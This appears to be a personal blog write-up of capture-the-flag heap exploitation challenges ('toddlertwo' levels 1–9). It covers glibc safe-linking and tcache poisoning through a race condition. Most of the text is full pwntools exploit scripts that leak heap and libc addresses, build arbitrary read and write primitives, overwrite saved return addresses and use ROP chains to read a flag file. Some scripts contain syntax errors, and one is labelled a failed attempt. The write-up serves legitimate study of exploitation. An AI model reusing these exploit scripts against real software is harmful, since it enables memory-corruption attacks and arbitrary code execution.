we can notice that the first 8 bytes of the chunk is 0x00007f44ac000, which is not a valid high layout address. because libc 2.33 uses a newer technique: PROTECT_PTR macro.

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;
  //and one line difference in tcache_put()!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

the server is using libc-2.31, which matches with ubuntu20.04. and this version doesn’t have PROTECT_PTR macro.

the result on my kali2021 is:

#this is tcache next pointer(with padded address)
pwndbg> vmmap 0x00000007f44ac000000
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7f44ac000000     0x7f44ac021000 rw-p    21000 0      [heap 3:1] +0x0
#this is tcache struct	
pwndbg> vmmap 0x00007f44ac0008d0
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7f44ac000000     0x7f44ac021000 rw-p    21000 0      [heap 3:1] +0x8d0

we continue to check the content of address 0x00007f44ac0008d0 to look up for libc-based address, which is appeal to us.

by x/512gx 0x00007f44ac0008d0, we can found the useful addresses in higher space than heap. just take one. and use the offset among known addresses to calc more addresses.

Okay, the beginning of the heap stores some infomation containing a pointer to main_arena. so we should use x/512gx 0x00007f44ac000000, which is page-aligned version of previous one.

then we can find this:

in founded address:
/*0x7f055c000880: 0x0000000000000000      0x0000000000000000*/     
# 0x7f055c000890: 0x00007f0563ef5ba0      0x0000000000000000      
/*0x7f055c0008a0: 0x0000000000000001      0x0000000000021000*/
and in maps:
/*  0x7f0563d38000     0x7f0563d5e000 r--p    26000 0      /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563d5e000     0x7f0563ea6000 r-xp   148000 26000  /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563ea6000     0x7f0563ef1000 r--p    4b000 16e000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563ef1000     0x7f0563ef2000 ---p     1000 1b9000 /usr/lib/x86_64-linux-gnu/libc-2.33.so*/
#   0x7f0563ef2000     0x7f0563ef5000 r--p     3000 1b9000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
/*  0x7f0563ef5000     0x7f0563ef8000 rw-p     3000 1bc000 /usr/lib/x86_64-linux-gnu/libc-2.33.so*/

These two are perfectly matched. and now we find the main_arena’s address.

level1

the additional command is send_flag, which calls load_secret() and strcmp() to check whether the pwd is correct. the answer is a randomized string taking the flag as seed. wont change between runnings.

in this level, the pwd is stored into bss segment in main function.

Thinking process:

we must leak the pwd through arbitrary read, and before the read we should also get the stack pointer of some stack frame.

and the secret_correct’s stack frame base is a constant offset by libc base which is 0x4640 in my kali2021. the pwd is stored in ebp-0x20, and the length is 16 bytes.

but secret_correct() has stack reuse protection: memset(s2, 0, 0x11uLL) to set pwd string to NULL.

emmmm………………….. should i try a race to read pwd before he clears out the PWD s2? I think not.

I can change the return address of challenge() to win() after using quit command. by using the function’s ebp i can easily locate it.

or, in this level, main function puts the pwd into 0x405655, where we can directly read out from.

wtf, when i try to read the main_arean_addr, the value stored there begins with ‘\x0a’, which means ‘\n’ and will stop printf to print all the rest chars.
pwndbg> x/8bx 0x00007fbc88000890
0x7fbc88000890: 0xa0 0x9b 0x1a 0x8f 0xbc 0x7f 0x00 0x00

Okay, that’s because i use the recvline, it will stop at the carrige return.

so we should use r1.clean() to receive message.

why would the printf print out the null bytes?????? Im so confused.

ohhhh, i think i get the point. before the printf prints out a string, it will check the string length by locating the null byte. and then it will call the write syscall to prints out all bytes(such as null byte). but in race condition, with previously filled AAAAAAAABBBBBBBB, after passing the length check, now printf is scheduled to free. then the ‘string’ is a tcache_perthread_ptr, the write syscall will directly prints it out.

~~but we can’t read the null byte in, nor the white characters~~.we can scanf null bytes into the buffer. the scanf simply adds a \0 to the end of the string, without checking whether there are null bytes in it . what a surprise.

Again, i forgot the libc version on my kali is 2.33. stucked in why tcache poisoning don’t work, neglected the PROTECT_PTR macro.

but i figure out that the chunk 0 is at a constant offset from the tcache_perthread_struct address, which is 0x650. the tcache link at the end of controlled_allocation is like this: tcache_entry[i]->chunk_0->packed address

and what we all need is addr(@packed) and chunk0 addr(now we get it), and then perform calc like this: (addr>>12)^packed.

but the second time using arbitrary read it says: malloc(): unaligned tcache chunk detected , that’s because the target 0x405655 is not aligned with 16 bytes in x86-64 machine. however, using 0x405650 as string start address will encounter the problem that it starts with the null bytes.

pwndbg> x/21bc 0x405650
0x405650 <secret+80>:   0 '\0' 0 '\0' 0 '\0' 0 '\0' 0 '\0' 109 'm' 108 'l' 116 't'
0x405658 <secret+88>:   122 'z' 102 'f' 118 'v' 114 'r' 102 'f' 113 'q' 103 'g' 106 'j'
0x405660 <secret+96>:   120 'x' 118 'v' 107 'k' 112 'p' 101 'e'

so we could use arbitrary_write() to change address stored in message[2], and ~~only need to change the last byte~~. scanf will read in null byte, so it needs full address to be packed.

finally, i use this plan(as follows). change the message’s content to another place where we want to overwrite.

r1.sendline(b'malloc 2') #make sure it exists.
arbitrary_write(r1, r2, 0x405220+0x10, 0x405655)
r1.sendline(b'printf 2') #print it out.
r1.recvuntil(b'MESSAGE: ')
pwd = r1.clean() #finally we get the pwd.
print("PWD : ", pwd)
r1.sendline(b'send_flag '+pwd)

full exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.5)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr, idx_=None):
    global idx
    if idx_ == None: #嗯, 好像没什么用.
        idx_ = idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
    chunk_idx_addr = perthread_leak + 0x650 + 0x410*idx
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx_}')
    r1.sendline(f'free {idx_}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx_}')
    idx = idx_ + 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, idx_=None):
    global idx
    if idx_ == None: #嗯, 好像没什么用.
        idx_ = idx
    controlled_allocation(r1, r2, addr, idx_)
    r1.sendline(f'printf {idx_-1}')
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value):
    global idx
    controlled_allocation(r1, r2, addr)
    #这里忘加上context.binary的设置直接给我默认i386架构, value给我4字节对齐
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat([value]))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level1.0.elf64'
p=pwn.process("./toddlertwo_level1.0.elf64")
print(open(f"/proc/{p.pid}/maps" ).read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
#main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
#pwn.gdb.attach(p, "b *challenge+0x19b\nb *challenge+0x302\ninit-pwndbg\nc\n")
#main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
#print("MAIN ARENA ADDR: ", hex(main_arena_addr))
#pwn.gdb.attach(p, "b challenge+0x10b\ninit-pwndbg\nc\n")
#libc_base = main_arena_addr - 0x1bdba0
#print('LIBC BASE: ', hex(libc_base))
#secretCorrect_frame_base = libc_base - 0x4640
#print("SECRET FRAME BASE: ", hex(secretCorrect_frame_base))
#pwn.gdb.attach(p, "b *challenge+0x19b\nb *challenge+0x302\ninit-pwndbg\nc\n")
#arbitrary_read(r1, r2, 0x405650, 2)
r1.sendline(b'malloc 2')
arbitrary_write(r1, r2, 0x405220+0x10, 0x405655)
r1.sendline(b'printf 2')
r1.recvuntil(b'MESSAGE: ')
pwd = r1.clean()
print("PWD : ", pwd)
r1.sendline(b'send_flag '+pwd)
print(next(a for a in r1.clean().split(b'\n') if b'flag{' in a))
pwn.gdb.attach(p, "init-pwndbg\n")

there is no difference between .0 and .1 level.

level2

protections are all turned on.

there is no load_secret() function in main, so the last way may be rewriting the retrun address of challenge().

for test:

1 2	`p/d (int[15])stored p/x (char*[15])messages`

it’s so hard to do with libc-2.33. the memory align check is annoying. just assuming that the binary base is already known.

fail exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}')
    r1.sendline(f'free {idx}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040++0x8*10, addr)
        r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level2.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))
#LET'S ROLLING
win_addr = binary_base + 0x1778
arbitrary_write(r1, r2, stored_rip_addr, [win_addr], True)
r1.sendline(b'quit')
p.clean()
print(r1.clean().decode())

level3

a hint from the code:

1 2	`fwrite("Storing the secret in this thread's stack.\n", 1uLL, 0x2BuLL, (FILE *)__readfsqword(0xFFFFFFF8)); load_secret(&v5);`

so it’s quite easy, just need to locate the challenge’s frame base.

the stored_rip_addr is at a constant offset from the challenge’s frame base.

level4

nothing special

level5

Storing the secret in the environment by setenv(). env is pointed by the environ in libc. i need to have a look at that blog to learn how to dig into ld library. let me add a new section in key points.

distance libc_base ld_base = 0x1df000 bytes. the secret is stored in the main thread heap.

plan:

wrong start:

~~at first read out of the binary base(in kali the only way i can is cheat…)~~

~~locating the env string in heap. read out of it.~~

after read out the main_arena’s base, read out the top field content, which is the top chunk of the main thread near the binary. it won’t change when child threads receiving and processing commands.
next locate the distance between the top_chunk and secret’s address. this is also a constant.
read out the secret.
then use send_flag command.
~~or just change the return address of challenge.~~

exp(the second method):

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}')
    r1.sendline(f'free {idx}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040++0x8*10, addr)
        r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level2.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))
#LET'S ROLLING
win_addr = binary_base + 0x1798
arbitrary_write(r1, r2, stored_rip_addr, [win_addr], True)
r1.sendline(b'quit')
p.clean()
print(r1.clean().decode())

level6

Storing the secret in the main thread’s heap.

what the difference with the previous one?

level7

there is no send_flag command and win() function.

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}')
    r1.sendline(f'free {idx}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+message_offset+0x8*10, addr)
        if type(value[0]) == bytes:
            print('SCANF(bytes): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0])
        else if type(value[0]) == int:
            print('SCANF(int): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    #end of `if unalign:`
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level7.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

message_offset = 0x4040
perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))

#ROLLING!!!!!!!!!!!!!!!!!!!
libc = p.libc
libc.address = libc_base
rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\x0c\x0d\x0e\x20")
rop.call("close", [3]) # used for correctly execute sendfile.
rop.call("read", [0, libc.bss(0x123), 42])
rop.call("open", [libc.bss(0x123), 0])
rop.call("sendfile", [1, 3, 0, 1024])
rop.call("exit", [42])

arbitrary_write(r1, r2, stored_rip_addr, [rop.chain()], True)
r1.sendline("quit")
p.send("/flag\0")
print( "LEAKED:", p.readall())
print("EXITED: ", p.poll())

level8

emmmm, i can’t figure out the difference.

ohhhh, it use the pthread_exit(), not the normal return, so the rop attack to the return address is no longer viable.

i may alter another thread’s return address, such as thread 3 scanf return. It just lies on the top of the challenge’s stack frame, so it is at the constant offset from somewhere in high address space.

address of the return address pointer of thread 3 scanf is stored at where at a constant offset from store_rip_address with ~~-0x801000~~ bytes distance.

okay, the fscanf doesn’t have push rbp this procedure, so calc the distance between fscanf and stored_rip_address by rbp+8 is purely inaccurate. the actual address of its return address should be checked by gdb into stack:

~~the pwntools is going crazy~~, i’m gonna crazy.

the read syscall with first arg being 0 won’t simply work as i thouhgt. there is something strange when communicateing with main thread’s stdin/stdout – could child thread be influenced by it?
or try to calc the address of tcp channel fd(in TLS addressing by fs register)?

the mov rax, fs:0x28 means referencing the value stored in fsbase+0x28 then copy it to rax. there is no shifting.

the second method looks more feasible. here it is(calc from libc_base):

okay, it’s stream pointer, i go wrong again.

~~when i follow the pace of fscanf, i found that it finally use fd=6 to read data in.~~

Fine, I am now absolutely grasping the principles. the first problem above is just a misunderstanding of all the file descriptor and file stream and threads.

in this program, main thread use accept() to receive a socket connect and return a fd. then run_thread() use fdopen() to turn fd into a FILE* stream, and write this FILE pointer into thread local storage(that is fs-based addressing).
the FILE stream and file descriptor are interchangeable, first is a high level interface, the second is a low level interface. child threads use fscanf and fprintf to read from or write to the stream(that is fds), that means the whole program’s stdin, stdout, and stderr is still viable in chile thread. so read(0, libc.bss(), 0x400) is correct.
one more thing needed to notice is that before thread 3 returns from fscanf, somewhere on the stack will be overwritten with what bytes I send into. so I additionally calc the right gadget of pop rdi so that the ropchain works.

exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    #pwn.gdb.attach(p, 'init-pwndbg\n')
    #input('press enter to continue')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}')
    r1.sendline(f'free {idx}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        if type(value[0]) == bytes:
            print('SCANF(bytes): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0])
            print('PROCESS POLL: ', p.poll())
        else:
            print('SCANF(int): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level8.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
if libc_base >  0:
    print('LIBC BASE: ', hex(libc_base))
    stored_rip_addr = main_arena_addr - 0x1c1d78
    print('STORED RIP ADDR: ', hex(stored_rip_addr))
    #stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
    #print('STORED RIP: ', stored_rip)
    binary_base = 0
    with open(f"/proc/{p.pid}/maps") as f: 
        binary_base = int(f.read(12), 16)
    print('BINARY BASE: ', hex(binary_base))

    libc = p.libc
    libc.address = libc_base
    rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\x0c\x0d\x20")
    rop.call("close", [3]) # used for correctly execute sendfile.
    rop.call("read", [0, libc.bss(0x123), 42])
    rop.call("open", [libc.bss(0x123), 0])
    rop.call("sendfile", [1, 3, 0, 1024])
    rop.call("exit", [42])

    thread3_scanf_return_saveaddress = stored_rip_addr - 0x801460
    #pwn.gdb.attach(p, 'init-pwndbg\nb __isoc99_fscanf\nc\nsp\nthr 3\n')
    #input("press enter to continue")
    arbitrary_write(r1, r2, thread3_scanf_return_saveaddress , [rop.chain()], True)
    #pwn.gdb.attach(p, 'init-pwndbg\nb *__isoc99_fscanf+176\nc\nsp\nthr 3\n')
    #input('press enter to continue')
    r2.sendline(pwn.p64(libc_base+0x27C2D))
    p.send(b"/flag\0")
    print("LEAKED:", p.clean())
else:
    print("FAILED!!!!!")

level9

这里要指向2处的地址, 也就是bss+0x10 ↩
这里开始就是从改变后的rsp弹出返回地址. 开始准备通过puts来leak处libc地址. ↩
这之后要接收puts的地址. ↩

PWN

CSCD70 && LLVM 上一篇

Computer Networking 下一篇

pwn modules的一点笔记

module 1-communication

The file system

Binary files

ELF base struct

Symbols

relocation

Dynamic Linking

Overview

Process

Lazy Linking

Process Loading

Process Execution

Cat is launched

Cat reads arg & env

Cat does thing

命令行参数和环境变量

PIPE

参考文档

WP

level(几来着)

level15新东西

Python – An enhanced Interactive Python

GETTING HELP

MAIN FEATURES

level16

level17

level18-21

level 22-28

level 29-34

level35-

level??

module 2-misuse

WP

module 3-asm

3 简单乘法

4-5 除法

6: 低位寄存器的名称

8-9 bitwise op

10. 开始内存操作

14-16.栈相关指令. 太简单了, 都是些基础题, 过了就算了

17. 跳转

22.调用

module 4-sc

0.基本操作

1.开始

